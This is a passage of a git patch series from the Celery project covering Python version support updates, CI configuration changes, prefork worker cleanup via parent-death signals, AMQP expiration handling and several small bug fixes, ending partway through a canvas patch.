Subject: [PATCH 054/177] update supported python versions on readme
---
README.rst | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.rst b/README.rst
index ac0f3e31150..47c811fbe23 100644
--- a/README.rst
+++ b/README.rst
@@ -59,8 +59,8 @@ What do I need?
Celery version 5.2.0b2 runs on,
-- Python (3.6, 3.7, 3.8, 3.9)
-- PyPy3.6 (7.6)
+- Python (3.7, 3.8, 3.9, 3.10)
+- PyPy3.7 (7.3+)
This is the next version of celery which will support Python 3.6 or newer.
From 816ab05e715bdf410aa2bec46a56f9838a84780e Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Tue, 31 Aug 2021 15:15:50 +0300
Subject: [PATCH 055/177] [pre-commit.ci] pre-commit autoupdate (#6935)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.24.0 → v2.25.0](https://github.com/asottile/pyupgrade/compare/v2.24.0...v2.25.0)
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index c05c93b2734..96762be07c8 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.24.0
+ rev: v2.25.0
hooks:
- id: pyupgrade
args: ["--py36-plus"]
From 42745cf43c245dd42a92cd8e1ed76699f19d1989 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:14:28 +0300
Subject: [PATCH 056/177] Remove appveyor configuration since we migrated to
GA.
---
appveyor.yml | 58 ----------------------------------------------------
1 file changed, 58 deletions(-)
delete mode 100644 appveyor.yml
diff --git a/appveyor.yml b/appveyor.yml
deleted file mode 100644
index 666932d9540..00000000000
--- a/appveyor.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-environment:
-
- global:
- # SDK v7.0 MSVC Express 2008's SetEnv.cmd script will fail if the
- # /E:ON and /V:ON options are not enabled in the batch script intepreter
- # See: https://stackoverflow.com/a/13751649/163740
- WITH_COMPILER: "cmd /E:ON /V:ON /C .\\extra\\appveyor\\run_with_compiler.cmd"
-
- matrix:
-
- # Pre-installed Python versions, which Appveyor may upgrade to
- # a later point release.
- # See: https://www.appveyor.com/docs/installed-software#python
-
- - PYTHON: "C:\\Python36-x64"
- PYTHON_VERSION: "3.6.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.6-unit"
-
- - PYTHON: "C:\\Python37-x64"
- PYTHON_VERSION: "3.7.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.7-unit"
-
- - PYTHON: "C:\\Python38-x64"
- PYTHON_VERSION: "3.8.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.8-unit"
-
-
-init:
- - "ECHO %PYTHON% %PYTHON_VERSION% %PYTHON_ARCH%"
-
-install:
- - "powershell extra\\appveyor\\install.ps1"
- - "%PYTHON%/python -m pip install -U pip setuptools tox"
- - "%PYTHON%/Scripts/pip.exe install -U eventlet"
- - "%PYTHON%/Scripts/pip.exe install -U -r requirements/extras/thread.txt"
-
-build: off
-
-test_script:
- - "%WITH_COMPILER% %PYTHON%/Scripts/tox -v -- -v"
-
-after_test:
- - "%WITH_COMPILER% %PYTHON%/python setup.py bdist_wheel"
-
-artifacts:
- - path: dist\*
-
-cache:
- - '%LOCALAPPDATA%\pip\Cache'
-
-#on_success:
-# - TODO: upload the content of dist/*.whl to a public wheelhouse
From fc20c44ae400e7ebf048d7c1b3c4fc8b8f3562e8 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:17:08 +0300
Subject: [PATCH 057/177] pyupgrade is now set to upgrade code to 3.7.
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 96762be07c8..a1807946d9b 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -3,7 +3,7 @@ repos:
rev: v2.25.0
hooks:
- id: pyupgrade
- args: ["--py36-plus"]
+ args: ["--py37-plus"]
- repo: https://github.com/PyCQA/flake8
rev: 3.9.2
From 27ebeaebf6b5720767b05cb0c62ef5f591d4d23f Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:19:39 +0300
Subject: [PATCH 058/177] Drop exclude statement since we no longer test with
pypy-3.6.
---
.github/workflows/python-package.yml | 3 ---
1 file changed, 3 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 0c1855b7ebb..a47283da6ac 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -26,9 +26,6 @@ jobs:
matrix:
python-version: ['3.7', '3.8', '3.9', '3.10.0-rc.1', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
- exclude:
- - os: windows-2019
- python-version: 'pypy-3.6'
steps:
- name: Install apt packages
From 602d4e1ebfd8abf27d01760979ff0637b2bede17 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:20:14 +0300
Subject: [PATCH 059/177] 3.10 is not GA so it's not supported yet.
---
README.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.rst b/README.rst
index 47c811fbe23..82b1ac6f047 100644
--- a/README.rst
+++ b/README.rst
@@ -59,7 +59,7 @@ What do I need?
Celery version 5.2.0b2 runs on,
-- Python (3.7, 3.8, 3.9, 3.10)
+- Python (3.7, 3.8, 3.9)
- PyPy3.7 (7.3+)
From a1e503e487edf31ca1e02c3cfd475a965b37556b Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:20:45 +0300
Subject: [PATCH 060/177] Celery 5.1 or earlier support Python 3.6.
---
README.rst | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.rst b/README.rst
index 82b1ac6f047..1aca1c075c2 100644
--- a/README.rst
+++ b/README.rst
@@ -72,6 +72,7 @@ an older version of Celery:
- Python 2.5: Celery series 3.0 or earlier.
- Python 2.4: Celery series 2.2 or earlier.
- Python 2.7: Celery 4.x series.
+- Python 3.6: Celery 5.1 or earlier.
Celery is a project with minimal funding,
so we don't support Microsoft Windows.
From 9e435228cb106588f408ae71b9d703ff81a80531 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:21:48 +0300
Subject: [PATCH 061/177] Fix linting error.
---
t/unit/backends/test_arangodb.py | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/t/unit/backends/test_arangodb.py b/t/unit/backends/test_arangodb.py
index 992c21a8ef4..4486f0b52c0 100644
--- a/t/unit/backends/test_arangodb.py
+++ b/t/unit/backends/test_arangodb.py
@@ -83,7 +83,7 @@ def test_config_params(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'https'
assert x.arangodb_url == 'https://test.arangodb.com:8529'
- assert x.verify == True
+ assert x.verify is True
def test_backend_by_url(
self, url="arangodb://username:password@host:port/database/collection"
@@ -108,7 +108,7 @@ def test_backend_params_by_url(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'http'
assert x.arangodb_url == 'http://test.arangodb.com:8529'
- assert x.verify == False
+ assert x.verify is False
def test_backend_cleanup(self):
now = datetime.datetime.utcnow()
From 5c47c1ff1aebd04b8e6b47255414e6f121b5c59f Mon Sep 17 00:00:00 2001
From: maybe-sybr <58414429+maybe-sybr@users.noreply.github.com>
Date: Fri, 3 Sep 2021 00:02:16 +1000
Subject: [PATCH 062/177] fix: Pass a `Context` when chaining fail results
(#6899)
This change ensures that during chaining of failure results, we always
reconstruct a `Context` object for the request rather than sometimes
passing a dictionary to the backend. This avoids upsetting expectations
in the backend implementations which often expect to be able to use
dotted attribute access on the `request` they are passed
Fixes #6882
---
celery/backends/base.py | 40 +++++++++++++++++++++++-----------------
1 file changed, 23 insertions(+), 17 deletions(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 91327ea2190..ffbd1d0307c 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -185,29 +185,35 @@ def mark_as_failure(self, task_id, exc,
except (AttributeError, TypeError):
chain_data = tuple()
for chain_elem in chain_data:
- chain_elem_opts = chain_elem['options']
+ # Reconstruct a `Context` object for the chained task which has
+ # enough information to for backends to work with
+ chain_elem_ctx = Context(chain_elem)
+ chain_elem_ctx.update(chain_elem_ctx.options)
+ chain_elem_ctx.id = chain_elem_ctx.options.get('task_id')
+ chain_elem_ctx.group = chain_elem_ctx.options.get('group_id')
# If the state should be propagated, we'll do so for all
# elements of the chain. This is only truly important so
# that the last chain element which controls completion of
# the chain itself is marked as completed to avoid stalls.
- if store_result and state in states.PROPAGATE_STATES:
- try:
- chained_task_id = chain_elem_opts['task_id']
- except KeyError:
- pass
- else:
- self.store_result(
- chained_task_id, exc, state,
- traceback=traceback, request=chain_elem
- )
+ #
+ # Some chained elements may be complex signatures and have no
+ # task ID of their own, so we skip them hoping that not
+ # descending through them is OK. If the last chain element is
+ # complex, we assume it must have been uplifted to a chord by
+ # the canvas code and therefore the condition below will ensure
+ # that we mark something as being complete as avoid stalling.
+ if (
+ store_result and state in states.PROPAGATE_STATES and
+ chain_elem_ctx.task_id is not None
+ ):
+ self.store_result(
+ chain_elem_ctx.task_id, exc, state,
+ traceback=traceback, request=chain_elem_ctx,
+ )
# If the chain element is a member of a chord, we also need
# to call `on_chord_part_return()` as well to avoid stalls.
- if 'chord' in chain_elem_opts:
- failed_ctx = Context(chain_elem)
- failed_ctx.update(failed_ctx.options)
- failed_ctx.id = failed_ctx.options['task_id']
- failed_ctx.group = failed_ctx.options['group_id']
- self.on_chord_part_return(failed_ctx, state, exc)
+ if 'chord' in chain_elem_ctx.options:
+ self.on_chord_part_return(chain_elem_ctx, state, exc)
# And finally we'll fire any errbacks
if call_errbacks and request.errbacks:
self._call_task_errbacks(request, exc, traceback)
From 917088f6987d99b51364e43353c6ef1ce8e02e24 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Thu, 2 Sep 2021 20:36:42 +0300
Subject: [PATCH 063/177] =?UTF-8?q?Bump=20version:=205.2.0b2=20=E2=86=92?=
=?UTF-8?q?=205.2.0b3?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 6 +++---
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index 90de144c22e..cf0e85fec33 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0b2
+current_version = 5.2.0b3
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 1aca1c075c2..9a6b2335717 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0b2 (dawn-chorus)
+:Version: 5.2.0b3 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -57,7 +57,7 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.2.0b2 runs on,
+Celery version 5.2.0b3 runs on,
- Python (3.7, 3.8, 3.9)
- PyPy3.7 (7.3+)
@@ -90,7 +90,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.2.0b2 coming from previous versions then you should read our
+new to Celery 5.0.5 or 5.2.0b3 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/celery/__init__.py b/celery/__init__.py
index 6248ddec82c..3fdffce06ca 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0b2'
+__version__ = '5.2.0b3'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 5cf7b344ea5..48c25ce0f07 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0b2 (cliffs)
+:Version: 5.2.0b3 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From 8ae12153212e2b54a6d0e9fa633b9139321d7585 Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Sun, 5 Sep 2021 18:09:31 +0200
Subject: [PATCH 064/177] Kill all workers when main process exits in prefork
model (#6942)
* Kill all workers when main process exits in prefork model
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
* Make flake8 happy
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
celery/concurrency/prefork.py | 2 ++
celery/platforms.py | 11 ++++++++++
t/unit/concurrency/test_prefork.py | 32 +++++++++++++++++++++---------
t/unit/utils/test_platforms.py | 14 ++++++++++++-
4 files changed, 49 insertions(+), 10 deletions(-)
diff --git a/celery/concurrency/prefork.py b/celery/concurrency/prefork.py
index a764611444a..40772ebae1a 100644
--- a/celery/concurrency/prefork.py
+++ b/celery/concurrency/prefork.py
@@ -41,6 +41,8 @@ def process_initializer(app, hostname):
Initialize the child pool process to ensure the correct
app instance is used and things like logging works.
"""
+ # Each running worker gets SIGKILL by OS when main process exits.
+ platforms.set_pdeathsig('SIGKILL')
_set_task_join_will_block(True)
platforms.signals.reset(*WORKER_SIGRESET)
platforms.signals.ignore(*WORKER_SIGIGNORE)
diff --git a/celery/platforms.py b/celery/platforms.py
index d2fe02bede3..8af1876fde6 100644
--- a/celery/platforms.py
+++ b/celery/platforms.py
@@ -17,6 +17,7 @@
from contextlib import contextmanager
from billiard.compat import close_open_fds, get_fdmax
+from billiard.util import set_pdeathsig as _set_pdeathsig
# fileno used to be in this module
from kombu.utils.compat import maybe_fileno
from kombu.utils.encoding import safe_str
@@ -708,6 +709,16 @@ def strargv(argv):
return ''
+def set_pdeathsig(name):
+ """Sends signal ``name`` to process when parent process terminates."""
+ if signals.supported('SIGKILL'):
+ try:
+ _set_pdeathsig(signals.signum('SIGKILL'))
+ except OSError:
+ # We ignore when OS does not support set_pdeathsig
+ pass
+
+
def set_process_title(progname, info=None):
"""Set the :command:`ps` name for the currently running process.
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index f240123a448..713b63d7baf 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -53,11 +53,18 @@ def get(self):
return self.value
+@patch('celery.platforms.set_mp_process_title')
class test_process_initializer:
+ @staticmethod
+ def Loader(*args, **kwargs):
+ loader = Mock(*args, **kwargs)
+ loader.conf = {}
+ loader.override_backends = {}
+ return loader
+
@patch('celery.platforms.signals')
- @patch('celery.platforms.set_mp_process_title')
- def test_process_initializer(self, set_mp_process_title, _signals):
+ def test_process_initializer(self, _signals, set_mp_process_title):
with mock.restore_logging():
from celery import signals
from celery._state import _tls
@@ -67,13 +74,7 @@ def test_process_initializer(self, set_mp_process_title, _signals):
on_worker_process_init = Mock()
signals.worker_process_init.connect(on_worker_process_init)
- def Loader(*args, **kwargs):
- loader = Mock(*args, **kwargs)
- loader.conf = {}
- loader.override_backends = {}
- return loader
-
- with self.Celery(loader=Loader) as app:
+ with self.Celery(loader=self.Loader) as app:
app.conf = AttributeDict(DEFAULTS)
process_initializer(app, 'awesome.worker.com')
_signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
@@ -100,6 +101,19 @@ def Loader(*args, **kwargs):
finally:
os.environ.pop('CELERY_LOG_FILE', None)
+ @patch('celery.platforms.set_pdeathsig')
+ def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title):
+ with mock.restore_logging():
+ from celery import signals
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+ from celery.concurrency.prefork import process_initializer
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _set_pdeathsig.assert_called_once_with('SIGKILL')
+
class test_process_destructor:
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index f0b1fde8d3a..4100ad56560 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -18,7 +18,7 @@
close_open_fds, create_pidlock, detached,
fd_by_path, get_fdmax, ignore_errno, initgroups,
isatty, maybe_drop_privileges, parse_gid,
- parse_uid, set_mp_process_title,
+ parse_uid, set_mp_process_title, set_pdeathsig,
set_process_title, setgid, setgroups, setuid,
signals)
from celery.utils.text import WhateverIO
@@ -170,6 +170,18 @@ def test_setitem_raises(self, set):
signals['INT'] = lambda *a: a
+class test_set_pdeathsig:
+
+ def test_call(self):
+ set_pdeathsig('SIGKILL')
+
+ @t.skip.if_win32
+ def test_call_with_correct_parameter(self):
+ with patch('celery.platforms._set_pdeathsig') as _set_pdeathsig:
+ set_pdeathsig('SIGKILL')
+ _set_pdeathsig.assert_called_once_with(signal.SIGKILL)
+
+
@t.skip.if_win32
class test_get_fdmax:
From 61587d12033d289d3004974a91c054d7b4360f8d Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 7 Sep 2021 19:57:06 +0600
Subject: [PATCH 065/177] test kombu 5.2.0rc1 (#6947)
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index b892226269a..6d28411082d 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,6 +1,6 @@
pytz>dev
billiard>=3.6.4.0,<4.0
-kombu>=5.1.0,<6.0
+kombu>=5.2.0rc1,<6.0
vine>=5.0.0,<6.0
click>=8.0,<9.0
click-didyoumean>=0.0.3
From b686c6e66fb07238a2a7a7a22c542069f9e2db9a Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 7 Sep 2021 20:24:32 +0600
Subject: [PATCH 066/177] try moto 2.2.x (#6948)
---
requirements/test.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/test.txt b/requirements/test.txt
index 0325981f8e8..0dd666f70bf 100644
--- a/requirements/test.txt
+++ b/requirements/test.txt
@@ -4,7 +4,7 @@ pytest-celery
pytest-subtests
pytest-timeout~=1.4.2
boto3>=1.9.178
-moto==2.0.10
+moto>=2.2.6
pre-commit
-r extras/yaml.txt
-r extras/msgpack.txt
From ac7cc1e1c6017ea4cc1eb11e7206d703cda1a2e3 Mon Sep 17 00:00:00 2001
From: Micah Lyle
Date: Sun, 23 May 2021 08:34:42 -0700
Subject: [PATCH 067/177] Prepared Hacker News Post on Release Action
---
.../workflows/post_release_to_hacker_news.yml | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
create mode 100644 .github/workflows/post_release_to_hacker_news.yml
diff --git a/.github/workflows/post_release_to_hacker_news.yml b/.github/workflows/post_release_to_hacker_news.yml
new file mode 100644
index 00000000000..d81bfb22c43
--- /dev/null
+++ b/.github/workflows/post_release_to_hacker_news.yml
@@ -0,0 +1,17 @@
+on:
+ release:
+ types: [released]
+
+jobs:
+ post_release_to_hacker_news:
+ runs-on: ubuntu-latest
+ name: Post Release to Hacker News
+ steps:
+ - name: Post the Release
+ uses: MicahLyle/github-action-post-to-hacker-news@v1
+ env:
+ HN_USERNAME: ${{ secrets.HN_USERNAME }}
+ HN_PASSWORD: ${{ secrets.HN_PASSWORD }}
+ HN_TITLE_FORMAT_SPECIFIER: Celery v%s Released!
+ HN_URL_FORMAT_SPECIFIER: https://docs.celeryproject.org/en/v%s/changelog.html
+ HN_TEST_MODE: true
From 590703c65d2c2b2e73019eb1cfbd18a25fdab0bb Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 7 Sep 2021 20:22:20 +0600
Subject: [PATCH 068/177] update setup with python 3.7 as minimum
---
setup.py | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/setup.py b/setup.py
index 7a760178a65..f81e2404f36 100644
--- a/setup.py
+++ b/setup.py
@@ -163,7 +163,7 @@ def run_tests(self):
license='BSD',
platforms=['any'],
install_requires=install_requires(),
- python_requires=">=3.6,",
+ python_requires=">=3.7,",
tests_require=reqs('test.txt'),
extras_require=extras_require(),
cmdclass={'test': pytest},
@@ -188,7 +188,6 @@ def run_tests(self):
"Programming Language :: Python",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3",
- "Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
From dc4bb4280c2e8a296522486b467278367b8faf09 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 7 Sep 2021 22:41:06 +0600
Subject: [PATCH 069/177] update kombu on setupcfg
---
setup.cfg | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/setup.cfg b/setup.cfg
index 3638e56dc6f..53909275c13 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -31,7 +31,7 @@ per-file-ignores =
[bdist_rpm]
requires = pytz >= 2016.7
billiard >= 3.6.3.0,<4.0
- kombu >= 4.6.8,<5.0.0
+ kombu >= 5.2.0rc1,<6.0.0
[bdist_wheel]
universal = 0
From 966a66dfcd4dda0e4f558bcc74c968747b16e2bf Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Mon, 6 Sep 2021 22:04:32 +0200
Subject: [PATCH 070/177] Added note about automatic killing all child
processes of worker after its termination
---
docs/userguide/workers.rst | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/docs/userguide/workers.rst b/docs/userguide/workers.rst
index 74e29490913..1e51c915e67 100644
--- a/docs/userguide/workers.rst
+++ b/docs/userguide/workers.rst
@@ -97,6 +97,11 @@ longer version:
$ ps auxww | awk '/celery worker/ {print $2}' | xargs kill -9
+.. versionchanged:: 5.2
+ On Linux systems, Celery now supports sending :sig:`KILL` signal to all child processes
+ after worker termination. This is done via `PR_SET_PDEATHSIG` option of ``prctl(2)``.
+
+
.. _worker-restarting:
Restarting the worker
From d3a4d07e16b169e3c056f1344cce68a07f3cf839 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 13 Sep 2021 16:33:50 +0000
Subject: [PATCH 071/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.25.0 → v2.26.0](https://github.com/asottile/pyupgrade/compare/v2.25.0...v2.26.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index a1807946d9b..d6a815ae694 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.25.0
+ rev: v2.26.0
hooks:
- id: pyupgrade
args: ["--py37-plus"]
From 6c9f7854bd5b26ea288cd5c002cf57375989c6da Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Thu, 16 Sep 2021 10:59:27 +0200
Subject: [PATCH 072/177] Move importskip before greenlet import (#6956)
* Move importskip before greenlet import
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
t/unit/concurrency/test_eventlet.py | 11 ++++++-----
1 file changed, 6 insertions(+), 5 deletions(-)
diff --git a/t/unit/concurrency/test_eventlet.py b/t/unit/concurrency/test_eventlet.py
index 9dcdb479b26..aff2d310368 100644
--- a/t/unit/concurrency/test_eventlet.py
+++ b/t/unit/concurrency/test_eventlet.py
@@ -2,10 +2,13 @@
from unittest.mock import Mock, patch
import pytest
-from greenlet import GreenletExit
-import t.skip
-from celery.concurrency.eventlet import TaskPool, Timer, apply_target
+pytest.importorskip('eventlet')
+
+from greenlet import GreenletExit # noqa
+
+import t.skip # noqa
+from celery.concurrency.eventlet import TaskPool, Timer, apply_target # noqa
eventlet_modules = (
'eventlet',
@@ -15,8 +18,6 @@
'greenlet',
)
-pytest.importorskip('eventlet')
-
@t.skip.if_pypy
class EventletCase:
From 1584138098900677dcc715d3918bd8a716f89e70 Mon Sep 17 00:00:00 2001
From: Nicolae Rosia
Date: Thu, 16 Sep 2021 15:48:20 +0300
Subject: [PATCH 073/177] amqp: send expiration field to broker if requested by
user (#6957)
* amqp: send expiration field to broker if requested by user
Signed-off-by: Nicolae Rosia
* fix for when expires is datetime
Signed-off-by: Nicolae Rosia
* compile fix
Signed-off-by: Nicolae Rosia
* improve codecov
Signed-off-by: Nicolae Rosia
* comment fix
Signed-off-by: Nicolae Rosia
* yet another test
Signed-off-by: Nicolae Rosia
---
celery/app/base.py | 10 ++++++++++
t/unit/tasks/test_tasks.py | 24 +++++++++++++++++++++++-
2 files changed, 33 insertions(+), 1 deletion(-)
diff --git a/celery/app/base.py b/celery/app/base.py
index 3df9577dbe1..5d072bb109e 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -732,6 +732,16 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
ignore_result = options.pop('ignore_result', False)
options = router.route(
options, route_name or name, args, kwargs, task_type)
+ if expires is not None:
+ if isinstance(expires, datetime):
+ expires_s = (expires - self.now()).total_seconds()
+ else:
+ expires_s = expires
+
+ if expires_s < 0:
+ expires_s = 0
+
+ options["expiration"] = expires_s
if not root_id or not parent_id:
parent = self.current_worker_task
diff --git a/t/unit/tasks/test_tasks.py b/t/unit/tasks/test_tasks.py
index 25229e7ba90..4beeaf967d0 100644
--- a/t/unit/tasks/test_tasks.py
+++ b/t/unit/tasks/test_tasks.py
@@ -930,7 +930,7 @@ def test_regular_task(self):
consumer, sresult, self.mytask.name, name='Elaine M. Benes',
)
- # With ETA.
+ # With ETA, absolute expires.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'},
eta=self.now() + timedelta(days=1),
@@ -941,6 +941,28 @@ def test_regular_task(self):
name='George Costanza', test_eta=True, test_expires=True,
)
+ # With ETA, absolute expires in the past.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Costanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=self.now() - timedelta(days=2),
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Costanza', test_eta=True, test_expires=True,
+ )
+
+ # With ETA, relative expires.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Costanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=2 * 24 * 60 * 60,
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Costanza', test_eta=True, test_expires=True,
+ )
+
# With countdown.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'}, countdown=10, expires=12,
From 34d9b7ee8dfee39192ccceb1ddb9bef5902ab802 Mon Sep 17 00:00:00 2001
From: John Zeringue
Date: Wed, 15 Sep 2021 12:19:41 -0400
Subject: [PATCH 074/177] Single line drift warning
The drift warning currently spans multiple lines, which causes issues
in some logging systems. Make it a single line message instead.
---
celery/events/state.py | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/celery/events/state.py b/celery/events/state.py
index 087131aeec3..febf1175145 100644
--- a/celery/events/state.py
+++ b/celery/events/state.py
@@ -51,10 +51,10 @@
#: before we alert that clocks may be unsynchronized.
HEARTBEAT_DRIFT_MAX = 16
-DRIFT_WARNING = """\
-Substantial drift from %s may mean clocks are out of sync. Current drift is
-%s seconds. [orig: %s recv: %s]
-"""
+DRIFT_WARNING = (
+ "Substantial drift from %s may mean clocks are out of sync. Current drift is "
+ "%s seconds. [orig: %s recv: %s]"
+)
logger = get_logger(__name__)
warn = logger.warning
From e2e3e95bf8ac9f85e1ee91753602c47bac878380 Mon Sep 17 00:00:00 2001
From: Erwin Van de Velde
Date: Fri, 17 Sep 2021 11:41:36 +0200
Subject: [PATCH 075/177] canvas: fix kwargs argument to prevent recursion
(#6810) (#6959)
* canvas: fix kwargs argument to prevent recursion (#6810)
* test for canvas: fix kwargs argument to prevent recursion (#6810)
Co-authored-by: Erwin Van de Velde
---
celery/canvas.py | 4 ++--
t/unit/tasks/test_chord.py | 18 ++++++++++++++++++
2 files changed, 20 insertions(+), 2 deletions(-)
diff --git a/celery/canvas.py b/celery/canvas.py
index 8a471ec0471..f3a8efce1d5 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -1352,10 +1352,10 @@ def _unpack_args(header=None, body=None, **kwargs):
def __init__(self, header, body=None, task='celery.chord',
args=None, kwargs=None, app=None, **options):
args = args if args else ()
